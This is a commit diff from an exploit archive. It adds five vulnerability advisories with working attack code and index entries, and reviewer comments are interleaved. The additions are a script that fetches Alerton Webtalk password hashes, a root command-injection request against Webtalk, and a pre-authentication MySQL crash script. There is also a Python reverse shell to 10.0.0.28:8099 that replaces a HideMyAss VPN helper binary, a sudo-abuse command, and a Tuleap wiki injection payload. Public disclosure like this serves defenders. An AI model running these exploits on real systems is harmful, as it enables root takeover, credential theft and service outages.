DB: 2017-05-02

5 new exploits

MySQL <= 5.6.35 / <= 5.7.17 - Integer Overflow
HideMyAss Pro VPN Client for OS X 2.2.7.0 - Privilege Escalation
HideMyAss Pro VPN Client for macOS 3.x - Privilege Escalation
Alerton Webtalk 2.5 / 3.3 - Multiple Vulnerabilities
Tuleap Project Wiki 8.3 <= 9.6.99.86 - Command Injection
Offensive Security 2017-05-02 05:01:18 +00:00
parent e4147fb21e
commit 4aa75d9fe9
6 changed files with 444 additions and 0 deletions


@ -5481,6 +5481,7 @@ id,file,description,date,author,platform,type,port
41941,platforms/windows/dos/41941.html,"Microsoft Internet Explorer 11.576.14393.0 - 'CStyleSheetArray::BuildListOfMatchedRules' Memory Corruption",2017-04-27,"Google Security Research",windows,dos,0 41941,platforms/windows/dos/41941.html,"Microsoft Internet Explorer 11.576.14393.0 - 'CStyleSheetArray::BuildListOfMatchedRules' Memory Corruption",2017-04-27,"Google Security Research",windows,dos,0
41945,platforms/windows/dos/41945.c,"Panda Free Antivirus - 'PSKMAD.sys' Denial of Service",2017-04-29,"Peter Baris",windows,dos,0 41945,platforms/windows/dos/41945.c,"Panda Free Antivirus - 'PSKMAD.sys' Denial of Service",2017-04-29,"Peter Baris",windows,dos,0
41949,platforms/windows/dos/41949.py,"IrfanView 4.44 - Denial of Service",2017-04-29,"Dreivan Orprecio",windows,dos,0 41949,platforms/windows/dos/41949.py,"IrfanView 4.44 - Denial of Service",2017-04-29,"Dreivan Orprecio",windows,dos,0
41954,platforms/multiple/dos/41954.py,"MySQL <= 5.6.35 / <= 5.7.17 - Integer Overflow",2017-05-01,"Rodrigo Marcos",multiple,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
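Review bot: the new `41954` row carries `port` 0 and a description that names only the bug class ("Integer Overflow") while its `type` column is `dos`; the neighbouring dos rows (41945, 41949) spell out "Denial of Service" in the description, and the PoC added in this commit is a pre-authentication remote DoS that defaults to port 3306. Consider `"MySQL <= 5.6.35 / <= 5.7.17 - Integer Overflow Denial of Service"` and, if the convention for network-facing entries is to record the service port (the remote rows below use 80 and 139), `3306` instead of `0`.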
@ -8963,6 +8964,8 @@ id,file,description,date,author,platform,type,port
41917,platforms/windows/local/41917.py,"Dell Customer Connect 1.3.28.0 - Privilege Escalation",2017-04-25,"Kacper Szurek",windows,local,0 41917,platforms/windows/local/41917.py,"Dell Customer Connect 1.3.28.0 - Privilege Escalation",2017-04-25,"Kacper Szurek",windows,local,0
41923,platforms/linux/local/41923.txt,"LightDM (Ubuntu 16.04/16.10) - Guest Account Local Privilege Escalation",2017-04-25,"G. Geshev",linux,local,0 41923,platforms/linux/local/41923.txt,"LightDM (Ubuntu 16.04/16.10) - Guest Account Local Privilege Escalation",2017-04-25,"G. Geshev",linux,local,0
41933,platforms/windows/local/41933.txt,"Realtek Audio Driver 6.0.1.7898 (Windows 10) - Dolby Audio X2 Service Privilege Escalation",2017-04-25,"Google Security Research",windows,local,0 41933,platforms/windows/local/41933.txt,"Realtek Audio Driver 6.0.1.7898 (Windows 10) - Dolby Audio X2 Service Privilege Escalation",2017-04-25,"Google Security Research",windows,local,0
41951,platforms/osx/local/41951.txt,"HideMyAss Pro VPN Client for OS X 2.2.7.0 - Privilege Escalation",2017-05-01,"Han Sahin",osx,local,0
41952,platforms/macos/local/41952.txt,"HideMyAss Pro VPN Client for macOS 3.x - Privilege Escalation",2017-05-01,"Han Sahin",macos,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
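Review bot: the two HideMyAss advisories for the same product line are split across the `osx` (41951) and `macos` (41952) platform directories, so a platform filter on either value will surface only one of them even though the 2.x advisory explicitly cross-references the unfixed 3.x issue. If the directory split is intentional (OS X 10.7-10.11 versus macOS), a note in the descriptions or a shared tag would help readers find both.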
@ -37799,3 +37802,5 @@ id,file,description,date,author,platform,type,port
41946,platforms/multiple/webapps/41946.txt,"Emby MediaServer 3.2.5 - SQL Injection",2017-04-30,LiquidWorm,multiple,webapps,0 41946,platforms/multiple/webapps/41946.txt,"Emby MediaServer 3.2.5 - SQL Injection",2017-04-30,LiquidWorm,multiple,webapps,0
41947,platforms/multiple/webapps/41947.txt,"Emby MediaServer 3.2.5 - Password Reset",2017-04-30,LiquidWorm,multiple,webapps,0 41947,platforms/multiple/webapps/41947.txt,"Emby MediaServer 3.2.5 - Password Reset",2017-04-30,LiquidWorm,multiple,webapps,0
41948,platforms/multiple/webapps/41948.txt,"Emby MediaServer 3.2.5 - Directory Traversal",2017-04-30,LiquidWorm,multiple,webapps,0 41948,platforms/multiple/webapps/41948.txt,"Emby MediaServer 3.2.5 - Directory Traversal",2017-04-30,LiquidWorm,multiple,webapps,0
41950,platforms/linux/webapps/41950.py,"Alerton Webtalk 2.5 / 3.3 - Multiple Vulnerabilities",2017-05-01,"David Tomaschik",linux,webapps,0
41953,platforms/php/webapps/41953.txt,"Tuleap Project Wiki 8.3 <= 9.6.99.86 - Command Injection",2017-05-01,"Ben Nott",php,webapps,0
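Review bot: two metadata fields in this hunk disagree with the files they index. The `41950` row is dated 2017-05-01, while the advisory's own timeline gives "2017/04/26 - This disclosure"; and the `41953` row names the author "Ben Nott", while the credit line in 41953.txt reads "Ben N". Align the CSV date with the disclosure date (or document that the column records the import date) and fix the credit line in the advisory so the two agree.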


platforms/linux/webapps/41950.py Executable file

@ -0,0 +1,199 @@
'''
Security Issues in Alerton Webtalk
==================================
Introduction
------------
Vulnerabilities were identified in the Alerton Webtalk Software supplied by
Alerton. This software is used for the management of building automation
systems. These were discovered during a black box assessment and therefore
the vulnerability list should not be considered exhaustive. Alerton has
responded that Webtalk is EOL and past the end of its support period. Customers
should move to newer products available from Alerton. Thanks to Alerton for prompt
replies in communicating with us about these issues.
Versions 2.5 and 3.3 were both confirmed to be affected by these issues.
Webtalk-01 - Password Hashes Accessible to Unauthenticated Users
----------------------------------------------------------------
Severity: **High**
Password hashes for all of the users configured in Alerton Webtalk are
accessible via a file in the document root of the webtalk user. The
location of this file is configuration dependent, however the configuration file is
accessible as well (at a static location, /~webtalk/webtalk.ini). The
password
database is a sqlite3 database whose name is based on the bacnet rep and job
entries from the ini file.
A python proof of concept to reproduce this issue is in an appendix.
Recommendation: Do not store sensitive data within areas being served by the
webserver.
Webtalk-02 - Command Injection for Authenticated Webtalk Users
--------------------------------------------------------------
Severity: **High**
Any user granted the configure webtalk permission can execute commands as
the root user on the underlying server. There appears to be some effort of
filtering command strings (such as rejecting commands containing pipes and
redirection operators) but this is inadequate. Using this vulnerability, an
attacker can add an SSH key to the root users authorized_keys file.
GET
/~webtalk/WtStatus.psp?c=update&updateopts=&updateuri=%22%24%28id%29%22&update=True
HTTP/1.1
Host: test-host
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101
Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: NID=...; _SID_=...; OGPC=...:
Connection: close
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Mon, 23 Jan 2017 20:34:26 GMT
Server: Apache
cache-control: no-cache
Set-Cookie: _SID_=...; Path=/;
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2801
...
uid=0(root) gid=500(webtalk) groups=500(webtalk)
...
Recommendation: User input should be avoided to shell commands. If this is
not possible, shell commands should be properly escaped. Consider using one of
the functions from the subprocess module without the shell=True parameter.
Webtalk-03 - Cross-Site Request Forgery
---------------------------------------
Severity: **High**
The entire Webtalk administrative interface lacks any controls against
Cross-Site Request Forgery. This allows an attacker to execute
administrative changes without access to valid credentials. Combined with the above
vulnerability, this allows an attacker to gain root access without any
credentials.
Recommendation: Implement CSRF tokens on all state-changing actions.
Webtalk-04 - Insecure Credential Hashing
----------------------------------------
Severity: **Moderate**
Password hashes in the userprofile.db database are hashed by concatenating
the password with the username (e.g., PASSUSER) and performing a plain MD5
hash. No salts or iterative hashing is performed. This does not follow password
hashing best practices and makes for highly practical offline attacks.
Recommendation: Use scrypt, bcrypt, or argon2 for storing password hashes.
Webtalk-05 - Login Flow Defeats Password Hashing
------------------------------------------------
Severity: **Moderate**
Password hashing is performed on the client side, allowing for the replay of
password hashes from Webtalk-01. While this only works on the mobile login
interface (PDA interface, /~webtalk/pda/pda_login.psp), the resulting
session is able to access all resources and is functionally equivalent to a login
through the Java-based login flow.
Recommendation: Perform hashing on the server side and use TLS to protect
secrets in transit.
Timeline
--------
2017/01/?? - Issues Discovered
2017/01/26 - Issues Reported to security@honeywell.com
2017/01/30 - Initial response from Alerton confirming receipt.
2017/02/04 - Alerton reports Webtalk is EOL and issues will not be fixed.
2017/04/26 - This disclosure
Discovery
---------
These issues were discovered by David Tomaschik of the Google ISA
Assessments team.
Appendix A: Script to Extract Hashes
------------------------------------
'''
import requests
import sys
import ConfigParser
import StringIO
import sqlite3
import tempfile
import os
def get_webtalk_ini(base_url):
"""Get the webtalk.ini file and parse it."""
url = '%s/~webtalk/webtalk.ini' % base_url
r = requests.get(url)
if r.status_code != 200:
raise RuntimeError('Unable to get webtalk.ini: %s', url)
buf = StringIO.StringIO(r.text)
parser = ConfigParser.RawConfigParser()
parser.readfp(buf)
return parser
def get_db_path(base_url, config):
rep = config.get('bacnet', 'rep')
job = config.get('bacnet', 'job')
url = '%s/~webtalk/bts/%s/%s/userprofile.db'
return url % (base_url, rep, job)
def load_db(url):
"""Load and read the db."""
r = requests.get(url)
if r.status_code != 200:
raise RuntimeError('Unable to get %s.' % url)
tmpfd, tmpname = tempfile.mkstemp(suffix='.db')
tmpf = os.fdopen(tmpfd, 'w')
tmpf.write(r.content)
tmpf.close()
con = sqlite3.connect(tmpname)
cur = con.cursor()
cur.execute("SELECT UserID, UserPassword FROM tblPassword")
results = cur.fetchall()
con.close()
os.unlink(tmpname)
return results
def users_for_server(base_url):
if '://' not in base_url:
base_url = 'http://%s' % base_url
ini = get_webtalk_ini(base_url)
db_path = get_db_path(base_url, ini)
return load_db(db_path)
if __name__ == '__main__':
for host in sys.argv[1:]:
try:
users = users_for_server(host)
except Exception as ex:
sys.stderr.write('%s\n' % str(ex))
continue
for u in users:
print '%s:%s' % (u[0], u[1])
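Review bot: `raise RuntimeError('Unable to get webtalk.ini: %s', url)` in `get_webtalk_ini` passes `url` as a second constructor argument instead of formatting it, so the message prints as a tuple; it should be `'Unable to get webtalk.ini: %s' % url`, matching the form used in `load_db`. Two smaller points: `os.fdopen(tmpfd, 'w')` should be `'wb'`, since `r.content` is the raw sqlite file and a text-mode write will corrupt it on platforms that translate newlines; and the script is Python 2 only (`print` statement, `ConfigParser`, `StringIO`) but carries no shebang or interpreter note, so a `#!/usr/bin/env python2` line or a comment in the appendix heading would save readers a confusing failure on Python 3.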

platforms/macos/local/41952.txt Executable file

@ -0,0 +1,43 @@
Source: https://www.securify.nl/advisory/SFY20170408/local_privilege_escalation_vulnerability_in_hidemyass_pro_vpn_client_v3_x_for_macos.html
Abstract
A local privilege escalation vulnerability has been found in the helper binary com.privax.hmaprovpn.helper that ships with HideMyAss Pro VPN v3.3.0.3 for macOS. The helper is installed setuid root and uses the openvpn binary to create VPN profiles and connections. The helper fails to perform signature check's on the openvpn file, which is owned by the user that installed the client. This allows malware on the system to replace the openvpn binary and run arbitrary code as root.
Tested versions:
This issue was tested on HideMyAss Pro VPN v3.3.0.3 for macOS.
Fix:
There is currently no fix available.
Introduction:
HideMyAss is a popular VPN service that allows users to hide their identity and browse anonymously online. HideMyAss also provides applications to setup the VPN connections, including a client for macOS. It was discovered that version 3.x of HMA Pro VPN for macOS is affected by local privilege escalation.
Details:
The helper binary com.privax.hmaprovpn.helper that ships with HideMyAss Pro VPN v3.3.0.3 for macOS is installed in PrivilegedHelperTools and run every time the user reboots. The privileged helper is responsible for opening VPN connections with correct security and connection profile settings.
The com.privax.hmaprovpn.helper is installed setuid root and fails to perform signature check's on the openvpn executable, which is owned by the user that installed the client. This allows malware on the system to replace the openvpn binary and run arbitrary code as root.
/advisory/SFY20170408/runopenvpnasroot.png
/advisory/SFY20170408/startopenvpn.png
Proof of Concept:
1) Create an Python script named openvpn and make sure it is executable (chmod u+x).
#!/usr/bin/python
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.0.0.28",8099));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);
2) Replace the openvpn binary located in the path below with this Python script.
/Applications/HMA\!\ Pro\ VPN.app/Contents/XPCServices/HMA\!\ Pro\ VPN\ Engine.xpc/Contents/MacOS/
3) Wait until the victim opens a VPN connection.
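Review bot: the two image references `/advisory/SFY20170408/runopenvpnasroot.png` and `/advisory/SFY20170408/startopenvpn.png` are site-relative paths copied from securify.nl and resolve to nothing in this file; either prefix them with `https://www.securify.nl` or drop them. Wording: "Create an Python script" should be "Create a Python script", and "signature check's" (twice) should be "signature checks". The "Fix:" section states that no fix is available without saying as of when, so a date next to "There is currently no fix available" would let readers judge whether the statement is still current.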

platforms/multiple/dos/41954.py Executable file

@ -0,0 +1,114 @@
'''
# Source: https://raw.githubusercontent.com/SECFORCE/CVE-2017-3599/master/cve-2017-3599_poc.py
# Exploit Title: Remote MySQL DOS (Integer Overflow)
# Google Dork: N/A
# Date: 13th April 2017
# Exploit Author: Rodrigo Marcos
# Vendor Homepage: https://www.mysql.com/
# Software Link: https://www.mysql.com/downloads/
# Version: 5.6.35 and below / 5.7.17 and below
# Tested on: N/A
# CVE : CVE-2017-3599
'''
import socket
import sys
from struct import pack
'''
CVE-2017-3599 Proof of Concept exploit code.
https://www.secforce.com/blog/2017/04/cve-2017-3599-pre-auth-mysql-remote-dos/
Rodrigo Marcos
'''
if len(sys.argv)<2:
print "Usage: python " + sys.argv[0] + " host [port]"
exit(0)
else:
HOST = sys.argv[1]
if len(sys.argv)>2:
PORT = int(sys.argv[2]) # Yes, no error checking... living on the wild side!
else:
PORT = 3306
print "[+] Creating packet..."
'''
3 bytes Packet lenth
1 bytes Packet number
Login request:
Packet format (when the server is 4.1 or newer):
Bytes Content
----- ----
4 client capabilities
4 max packet size
1 charset number
23 reserved (always 0)
n user name, \0-terminated
n plugin auth data (e.g. scramble), length encoded
n database name, \0-terminated
(if CLIENT_CONNECT_WITH_DB is set in the capabilities)
n client auth plugin name - \0-terminated string,
(if CLIENT_PLUGIN_AUTH is set in the capabilities)
'''
# packet_len = '\x64\x00\x00'
packet_num = '\x01'
#Login request packet
packet_cap = '\x85\xa2\xbf\x01' # client capabilities (default)
packet_max = '\x00\x00\x00\x01' # max packet size (default)
packet_cset = '\x21' # charset (default)
p_reserved = '\x00' * 23 # 23 bytes reserved with nulls (default)
packet_usr = 'test\x00' # username null terminated (default)
packet_auth = '\xff' # both \xff and \xfe crash the server
'''
Conditions to crash:
1 - packet_auth must start with \xff or \xfe
2 - packet_auth must be shorter than 8 chars
The expected value is the password, which could be of two different formats
(null terminated or length encoded) depending on the client functionality.
'''
packet = packet_cap + packet_max + packet_cset + p_reserved + packet_usr + packet_auth
packet_len = pack('i',len(packet))[:3]
request = packet_len + packet_num + packet
print "[+] Connecting to host..."
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
print "[+] Connected."
except:
print "[+] Unable to connect to host " + HOST + " on port " + str(PORT) + "."
s.close()
print "[+] Exiting."
exit(0)
print "[+] Receiving greeting from remote host..."
data = s.recv(1024)
print "[+] Done."
print "[+] Sending our payload..."
s.send(request)
print "[+] Done."
#print "Our data: %r" % request
s.close()
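Review bot: `packet_len = pack('i',len(packet))[:3]` depends on the host's native byte order being little-endian to produce MySQL's 3-byte little-endian length prefix; on a big-endian host the slice yields the wrong bytes. `pack('<I', len(packet))[:3]` gives the same result everywhere and documents the intent. The connect step also uses a bare `except:`, which swallows `KeyboardInterrupt` along with `socket.error`, and both the usage error and the connection failure `exit(0)` even though they are failures; an explicit `except socket.error` and a nonzero exit code would make the script's behaviour in automation clearer. Minor: "Packet lenth" in the docstring should be "Packet length".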

platforms/osx/local/41951.txt Executable file

@ -0,0 +1,45 @@
Source: https://www.securify.nl/advisory/SFY20170402/multiple_local_privilege_escalation_vulnerabilities_in_hidemyass_pro_vpn_client_v2_x_for_os_x.html
Abstract
Multiple local privilege escalation vulnerabilities were found in the helper binary HMAHelper that ships with HideMyAss Pro VPN for OS X. The helper is installed setuid root and responsible for loading Kernel Extensions (kext) and managing VPN firewall rules. These issues can be leveraged by a local attacker to gain elevated (root) privileges.
Tested versions:
This issue was tested on HMA Pro VPN version 2.2.7.0 for OS X
Fix:
HMA Support has reported that this issue will not be fixed. Version 2.2.7.0. is still available for download and was earlier this year also available in the Mac App Store. It seems that this version is still available for older versions of OS X (OS X 10.7 - 10.11).
It should be noted the latest version of HMA Pro VPN for OS X (version 3.3.0.3) is vulnerable to a similar local privilege escalation issue that is also not fixed at the time of writing.
Introduction:
HideMyAss is a popular VPN service that allows users to hide their identity and browse anonymously online. HideMyAss also provides applications to setup the VPN connections, including a client for OS X. It was discovered that version 2.x of HMA Pro VPN for OS X is affected by multiple local privilege escalation vulnerabilities.
Details:
The helper binary HMAHelper that ships with HMA Pro VPN for OS X is installed as setuid root. The helper has the ability to execute several commands as root, including running kernal extentions (kext) but also enabling and disabling security firewall rules.
Although disabling the firewall is dangerous enough, it was found that the helper is affected by multiple local privilege escalation vulnerabilities. Taking the FirewallDisable rule as an example, the code snippet below shows that there is no limit to which executable can be executed allowing a local user (or malware) to run any executable as root.
Privax.OSX.HMA.Helper.FirewallManager
private static void FirewallDisableSelected(string path, string args, string processNames)
{
using (Process process = new Process())
{
ProcessStartInfo startInfo = process.StartInfo;
startInfo.FileName = "/usr/bin/sudo";
startInfo.Arguments = string.Format("\"{0}\" \"{1}\" \"{2}\"", (object) path, (object) args, (object) processNames);
startInfo.CreateNoWindow = true;
startInfo.UseShellExecute = false;
PermissionsManager.PermissionsSet(PermissionsManager.UIDRoot, PermissionsManager.GIDWheel);
process.Start();
process.WaitForExit();
}
}
Proof of concept:
/Applications/HMA\!\ Pro\ VPN.app/Contents/Resources/Applications/HMAHelper.app/Contents/MacOS/HMAHelper --sib-firewall-enable 'su' ''
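Review bot: the code snippet shows `FirewallDisableSelected`, but the proof of concept invokes `--sib-firewall-enable`, so the reader cannot connect the two from the text alone; the advisory should either show the enable-side function or state that it builds the same unrestricted `/usr/bin/sudo "path" "args" "processNames"` invocation from caller-supplied `path`. Wording fixes: "kernal extentions" should be "kernel extensions", and "Version 2.2.7.0. is still available" has a stray period after the version number.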

platforms/php/webapps/41953.txt Executable file

@ -0,0 +1,38 @@
CVE: CVE-2017-7981
CVSSv3: 9.4 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P/RL:U/RC:C)
Versions affected: >= 8.3 and <= 9.6.99.86
Introduction
Tuleap is a Libre suite to plan, track, code and collaborate on software projects. Tuleap helps development teams to build awesome applications, better, faster, easier.
Background
Tuleap uses PHPWiki as a plugin to provide a weak feature for projects. The version of PHPWiki used is 1.3.10. This version contains a command injection vulnerability in the SyntaxHighlighter plugin. Other applications that use PHPWiki similar to Tuleap will also be affected by this issue.
The latest version of PHPWiki is 1.5.5 and is no longer vulnerable to this issue.
Vulnerability
Authenticated users, including unprivileged users, with access to a project containing a wiki, can exploit this command injection (CI) vulnerability to gain remote unauthorised access to the server hosting the Tuleap web application.
RCE is achieved by entering a SyntaxHighlighter plugin directive in a new wiki page on any wiki available in any project. The SyntaxHighligter plugin in vulnerable versions of PHPWiki passes the syntax argument to the proc_open() PHP builtin function which spawns a process in the operating system running the web application.
The following is an example plugin directie which would cause the id(1) command to be executed on a Linux server running an affected version of Tuleap.
<?plugin SyntaxHighlighter syntax="c;id"
code to be highlighted
?>
Versions Affected
This vulnerability has existed in the version of PHPWiki used by the Tuleap project since at least version 8.3 through to 9.6.99.86.
References
https://github.com/xdrr/vulnerability-research/blob/master/webapp/tuleap/2017.04.tuleap-auth-ci.md
https://tuleap.net/plugins/tracker/?aid=10159
Credit
This vulnerability was discovered by Ben N 19 April 2017.
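Review bot: the credit line "discovered by Ben N 19 April 2017" looks truncated (files.csv in this commit records the author as "Ben Nott") and is missing "on" before the date. Typos in the body: "weak feature" should be "wiki feature", "directie" should be "directive", and "SyntaxHighligter" should be "SyntaxHighlighter". The file also says only that PHPWiki 1.5.5 is no longer affected; since the entry is filed against Tuleap, stating the first fixed Tuleap release (or that none exists at the time of writing) next to the tracker reference would give operators the information they need to act.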